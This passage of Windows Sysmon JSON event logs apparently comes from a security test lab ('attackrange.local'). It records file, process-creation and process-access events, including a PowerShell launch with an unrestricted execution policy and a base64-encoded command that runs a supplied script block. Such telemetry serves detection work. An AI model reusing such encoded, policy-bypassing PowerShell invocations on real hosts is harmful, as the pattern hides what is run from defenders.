(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010D7BD0700}","TargetProcessId":"3152","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4901,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:09.908\r\nProcessGuid: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nProcessId: 4652\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\p5sz5phd.dll\r\nCreationUtcTime: 2020-08-01 07:59:09.908","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:09.908","ProcessGuid":"{41C8662E-20CD-5F25-0000-00108FB10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\p5sz5phd.dll","CreationUtcTime":"2020-08-01 07:59:09.908","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4902,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nProcessGuid: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nProcessId: 4652\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\p5sz5phd.cmdline\r\nCreationUtcTime: 2020-08-01 07:59:09.908","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","ProcessGuid":"{41C8662E-20CD-5F25-0000-00108FB10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\p5sz5phd.cmdline","CreationUtcTime":"2020-08-01 07:59:09.908","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4903,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.918\r\nProcessGuid: {41C8662E-20CD-5F25-0000-0010E7C40700}\r\nProcessId: 4284\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p5sz5phd.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nParentProcessId: 4652\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.918","ProcessGuid":"{41C8662E-20CD-5F25-0000-0010E7C40700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p5sz5phd.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20CD-5F25-0000-00108FB10700}","ParentProcessId":"4652","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4904,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nSourceProcessId: 4652\r\nSourceThreadId: 4580\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010E7C40700}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1552B68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","SourceProcessId":"4652","SourceThreadId":"4580","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010E7C40700}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1552B68F)","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4905,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010E7C40700}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010E7C40700}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4906,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4907,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 